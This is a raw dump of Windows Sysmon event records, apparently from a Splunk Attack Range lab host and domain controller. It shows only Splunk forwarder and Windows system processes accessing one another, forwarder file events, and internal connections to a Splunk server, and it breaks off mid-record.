11:14:47.361{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1727-6216-0405-000000003902}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.361{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1727-6216-0405-000000003902}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.362{4F8D34B0-1727-6216-0405-000000003902}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:47.127{4F8D34B0-1726-6216-0305-000000003902}36763548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:48.470{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7084ADF5FAE998C7A93D4C0349E34DC4,SHA256=0BD3D9AFE81A0E4EE300282185096EF1018646003B6A94827B4114CCF313C13F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:45.954{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51624-false10.0.1.12-8089- 23542300x8000000000000000221050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:48.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DD3F0016AC8ADF116F1C544F62867F3,SHA256=FEE5AE1AD671AF6CE2FE7E68DFC49113F8441733B4BB3BCD94E0B55DFF3405CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:48.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A822CCFB8E86772D1B37E4ABCACFFF6,SHA256=D229CFDD09410E3833042ECAD0E3E439FFEF9941B8AA4BE32DFDC780D6B447FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:45.614{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49423-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:49.506{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41A90E781B19231484D38696172F8818,SHA256=90A2A35CD831E611DA50C3BEECEADBD667CA6D65C7A7912A6C594C4CE2F672D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.892{4F8D34B0-1729-6216-0605-000000003902}35562428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1729-6216-0605-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1729-6216-0605-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.642{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1729-6216-0605-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.644{4F8D34B0-1729-6216-0605-000000003902}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.439{4F8D34B0-1729-6216-0505-000000003902}5283060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1729-6216-0505-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 